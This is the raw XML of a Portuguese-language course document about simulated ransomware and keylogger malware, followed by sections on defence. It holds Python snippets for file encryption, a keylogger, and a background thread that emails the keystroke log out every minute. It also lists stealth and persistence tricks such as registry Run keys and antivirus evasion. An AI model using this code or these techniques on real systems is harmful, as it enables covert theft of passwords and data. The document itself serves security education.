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sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">🛡️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Malwares Simulados com Python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D6A9F"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Projeto Educacional — Cibersegurança na Prática</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"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Ransomware  •  Keylogger  •  Estratégias de Defesa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⚠️  AVISO IMPORTANTE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Todo o conteúdo deste documento tem fins exclusivamente educacionais. Os scripts foram criados para demonstrar o funcionamento de malwares em ambiente controlado, como parte de um curso de cibersegurança. O uso fora de ambiente autorizado é ilegal e antiético.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4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Sumário do Projeto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Parte 1 — Ransomware Simulado: conceitos, código Python e análise técnica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Parte 2 — Keylogger Simulado: funcionamento, código e técnicas de furtividade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Parte 3 — Defesa e Prevenção: medidas técnicas e boas práticas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Parte 4 — Reflexões e Aprendizados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D6A9F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Parte 1 — Ransomware Simulado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1.1  O que é um Ransomware?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Ransomware é um tipo de malware que criptografa os arquivos da vítima e exige um pagamento — geralmente em criptomoedas — para fornecer a chave de descriptografia. É uma das ameaças cibernéticas mais lucrativas e devastadoras da atualidade, responsável por bilhões de dólares em prejuízos globais anualmente.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1.2  Ciclo de Vida de um Ataque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Infecção — via phishing, link malicioso, RDP exposto, USB infectado ou exploit de vulnerabilidade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Reconhecimento — o malware mapeia o sistema: tipos de arquivo, drives de rede, backups acessíveis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Conexão C2 (Command &amp; Control) — comunica com servidor do atacante; troca chaves criptográficas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Criptografia — arquivos são cifrados; geralmente AES-256 (simétrico) + RSA-4096 (assimétrico)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Extorsão — mensagem de resgate exibida; prazo para pagamento; ameaça de vazamento (double extortion)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1.3  Técnica Usada: Fernet (AES-128-CBC + HMAC-SHA256)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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simulação utiliza a biblioteca cryptography do Python, implementando o algoritmo Fernet — uma combinação de AES-128-CBC para criptografia e HMAC-SHA256 para verificação de integridade.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from cryptography.fernet import Fernet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# Geração da chave (em ataque real, enviada ao servidor C2)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chave = Fernet.generate_key()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fernet = Fernet(chave)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# Criptografar um arquivo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conteudo = open('relatorio.txt', 'rb').read()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criptografado = fernet.encrypt(conteudo)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open('relatorio.enc', 'wb').write(criptografado)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# Descriptografar (apenas com a chave correta)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original = fernet.decrypt(criptografado)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1.4  Diferença entre Simulação e Ataque Real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Medida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Eficácia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Aspecto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Simulação (este projeto)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Ataque Real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Chave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Salva localmente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Enviada ao servidor C2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Alcance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Pasta ./arquivos_teste/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Todo o sistema de arquivos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Propagação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Nenhuma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Rede local, drives mapeados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Persistência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 startup automático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Registro do Windows / cron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Exfiltração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 vazamento de dados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Dados roubados antes de cifrar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1.5  Fluxo do Script Simulado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[Opção 1] Criar arquivos de teste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  └─ Gera 4 arquivos .txt com dados fictícios em ./arquivos_teste/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[Opção 2] Executar ataque (criptografar)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  ├─ Gera chave Fernet aleatória → salva em chave_secreta.key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  ├─ Para cada arquivo .txt: criptografa → salva como .enc → remove original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  └─ Exibe e salva mensagem de resgate em LEIA-ME_RESGATE.txt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[Opção 3] Descriptografar (simular pagamento)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  ├─ Lê a chave de chave_secreta.key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  └─ Para cada arquivo .enc: descriptografa → restaura .txt → remove .enc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D6A9F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Parte 2 — Keylogger Simulado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2.1  O que é um Keylogger?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Um keylogger é um software (ou hardware) que registra todas as teclas digitadas pelo usuário, sem o seu conhecimento. As informações capturadas podem incluir senhas, números de cartão de crédito, mensagens privadas, e-mails e qualquer outro dado digitado.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2.2  Técnicas de Captura de Teclado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Medida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Eficácia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Técnica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Hook de API (Win)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Registra-se via SetWindowsHookEx no kernel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⚠️⚠️⚠️ Alto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pynput (cross-platform)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 API nativa de cada SO (Xlib/Quartz/Win32)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⚠️⚠️ Médio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Polling GetAsyncKeyState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Verifica estado de cada tecla em loop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⚠️⚠️ Médio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Rootkit (kernel mode)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 abaixo do sistema operacional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⚠️⚠️⚠️⚠️ Crítico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Browser extension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Injeta script JavaScript nas páginas web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⚠️⚠️⚠️ Alto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2.3  Código da Simulação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from pynput import keyboard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def ao_pressionar(tecla):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    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        # Tecla normal (letra, número, símbolo)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        with open('keylog.txt', 'a') as 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            f.write(tecla.char)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    except AttributeError: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        # Tecla especial (Enter, Space, Backspace...)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        mapeamento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            keyboard.Key.space:     ' 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            keyboard.Key.enter:     '\n[ENTER]\n',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            keyboard.Key.backspace: '[BACK]',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        texto = mapeamento.get(tecla, f'[{tecla.name}]')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        with open('keylog.txt', 'a') as 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            f.write(texto)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# Inicia captura — F12 encerra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with keyboard.Listener(on_press=ao_pressionar) as listener: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    listener.join()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2.4  Exfiltração por E-mail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Em um cenário real, o keylogger envia os logs periodicamente para o atacante por SMTP (e-mail), HTTP POST para um servidor C2, ou até via DNS tunneling. A simulação implementa o envio SMTP como demonstração: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import smtplib, threading, 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from email.mime.multipart import MIMEMultipart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def enviar_email():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    while True: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        time.sleep(60)  # Envia a cada 60 segundos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        msg = MIMEMultipart()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        msg['Subject'] = 'Keylog Update'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        # Anexa o arquivo de log...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        with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp: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            smtp.login(EMAIL, SENHA)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            smtp.send_message(msg)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# Inicia thread de envio em background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thread = threading.Thread(target=enviar_email, daemon=True)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thread.start()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2.5  Técnicas de Furtividade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Execução sem janela visível (pythonw.exe no Windows, processo daemon no Linux)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Nome do processo disfarçado como serviço legítimo do sistema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Entrada no Registro do Windows (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)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Tamanho mínimo: bibliotecas compactas, sem dependências óbvias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Polimorfismo: hash do executável muda a cada execução para evadir antivírus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Envio fracionado: pequenos pacotes de dados para não disparar alertas de DLP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D6A9F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Parte 3 — Defesa e Prevenção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3.1  Contra Ransomware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Medida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Eficácia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Backup 3-2-1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cópias, 2 mídias distintas, 1 offsite. Backups imutáveis (WORM) garantem recuperação sem pagar resgate.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⭐⭐⭐⭐⭐ Crítico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Segmentação de rede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Isola servidores críticos em VLANs. Limita propagação lateral do ransomware.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⭐⭐⭐⭐ Alto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Menor privilégio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Usuários sem acesso de escrita a tudo. Admin separado do usuário de trabalho.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⭐⭐⭐⭐ Alto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 management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Sistemas atualizados eliminam vetores de entrada como EternalBlue (WannaCry).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⭐⭐⭐⭐ Alto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EDR/XDR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Detecta comportamento anômalo: criptografia em massa de arquivos em segundos.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⭐⭐⭐⭐ Alto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Honeypot files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Arquivos iscas monitorados. Qualquer acesso dispara alerta imediato.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⭐⭐⭐ Médio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Conscientização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Simulações de phishing, treinamento em reconhecer e-mails maliciosos.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⭐⭐⭐⭐⭐ Crítico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3.2  Contra Keylogger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Medida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Eficácia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Antivírus / EDR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Detecta hooks de teclado suspeitos e comportamento de registro de teclas.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⭐⭐⭐⭐ Alto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MFA / Autenticação 2FA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Senha capturada sozinha é inútil sem o segundo fator (app, token, biometria).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⭐⭐⭐⭐⭐ Crítico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Teclado virtual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 senhas em ambientes públicos. Evita interceptação por API hook.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⭐⭐⭐ Médio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Sandboxing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Executáveis desconhecidos rodam em ambiente isolado antes de execução real.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⭐⭐⭐⭐ Alto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Monitoramento de rede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Detecta exfiltração: SMTP incomum, HTTP POST para IPs desconhecidos.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⭐⭐⭐ Médio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Gerenciador de senhas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Preenchimento automático não ativa hooks de teclado tradicionais.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⭐⭐⭐⭐ Alto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3.3  Modelo de Defesa em Profundidade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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estratégia mais eficaz combina múltiplas camadas de proteção, de forma que a falha em uma não comprometa todo o sistema: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│  Camada 7: Conscientização do Usuário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│  → Treinamentos, simulações de phishing, cultura de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│    segurança na organização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│  Camada 6: Segurança de Endpoint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│  → Antivírus, EDR, patch management, controle de USB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│  Camada 5: Controle de Acesso e Identidade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│  → MFA, RBAC, menor privilégio, Zero Trust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│  Camada 4: Segurança de Rede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│  → Firewall, IDS/IPS, segmentação VLAN, VPN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│  Camada 3: Segurança de Aplicação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│  → WAF, revisão de código, SAST/DAST, container scan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│  Camada 2: Segurança de Dados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│  → Criptografia em repouso e em trânsito (TLS/AES)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│  Camada 1: Backup e Recuperação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│  → Backup 3-2-1, plano DR testado, snapshots imutáveis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DA95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D6A9F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Parte 4 — Reflexões e Aprendizados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4.1  O que este projeto ensina?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Ransomware não é magia — é criptografia mal usada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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mesma biblioteca cryptography que protege transações bancárias e dados pessoais pode ser usada para extorquir vítimas. A diferença está no contexto e na intenção. Compreender isso nos lembra que a tecnologia é neutra — o impacto depende de quem a usa e como.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Keyloggers são assustadoramente simples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Menos de 30 linhas de Python são suficientes para capturar tudo que uma pessoa digita. Isso reforça que confiar apenas em senhas fortes não é suficiente — a defesa precisa ser multicamada porque o ataque é barato e acessível.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O elo mais fraco é humano</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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maioria dos ataques começa com phishing — um e-mail convincente, um link falso, um anexo malicioso. Nenhuma tecnologia de segurança substitui a conscientização do usuário. Treinamento contínuo e cultura de segurança são investimentos mais eficazes do que muitos softwares caros.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Backup é inegociável</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Diante de um ransomware bem executado, o backup é a única saída que não envolve pagar ao criminoso — e nem assim há garantia de recuperação. Backups imutáveis, testados regularmente, são o pilar de qualquer estratégia de resiliência.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Conhecer o ataque fortalece a defesa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"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Profissionais de segurança (blue team) precisam entender como o red team pensa e age. Este projeto demonstra que estudar malwares em ambiente controlado é uma prática legítima e essencial na formação de qualquer especialista em cibersegurança.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4.2  Aspectos Legais e Éticos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⚖️  Legislação Brasileira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criação e uso de malwares é crime no Brasil, tipificado pela Lei 12.737/2012 (Lei Carolina Dieckmann) e pelo Marco Civil da Internet (Lei 12.965/2014). Penas variam de 3 meses a 2 anos de reclusão, acrescidas da pena do crime consumado. NUNCA utilize estes scripts fora de ambiente controlado e autorizado.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Profissionais éticos em cibersegurança seguem o princípio do consentimento informado: toda e qualquer análise ou teste é realizado com autorização explícita do proprietário do sistema, documentada previamente.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4.3  Próximos Passos na Aprendizagem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Estudar o framework MITRE ATT&amp;CK para mapear técnicas de atacantes reais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Configurar um laboratório virtual (VirtualBox/VMware) com rede isolada para testes seguros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Obter certificações: CompTIA Security+, CEH (Certified Ethical Hacker), OSCP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Praticar em plataformas legais: TryHackMe, HackTheBox, PicoCTF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Aprender análise de malware dinâmica: sandbox automático (Any.Run, Cuckoo)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Estudar forense digital: como investigar incidentes após um ataque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4.4  Referências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MITRE ATT&amp;CK Framework — https://attack.mitre.org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CISA Ransomware Guide — https://www.cisa.gov/ransomware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Python cryptography library — https://cryptography.io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pynput documentation — https://pynput.readthedocs.io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Lei 12.737/2012 (Lei Carolina Dieckmann) — Planalto.gov.br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NIST Cybersecurity Framework — https://www.nist.gov/cyberframework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00" w:after="80"/>
        <w:jc w:val="center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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━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Projeto desenvolvido para fins educacionais — Curso de Python e Cibersegurança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Malwares Simulados com Python — Projeto Educacional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D6A9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2026-03-10T22:41:44.029Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-10T22:41:44.030Z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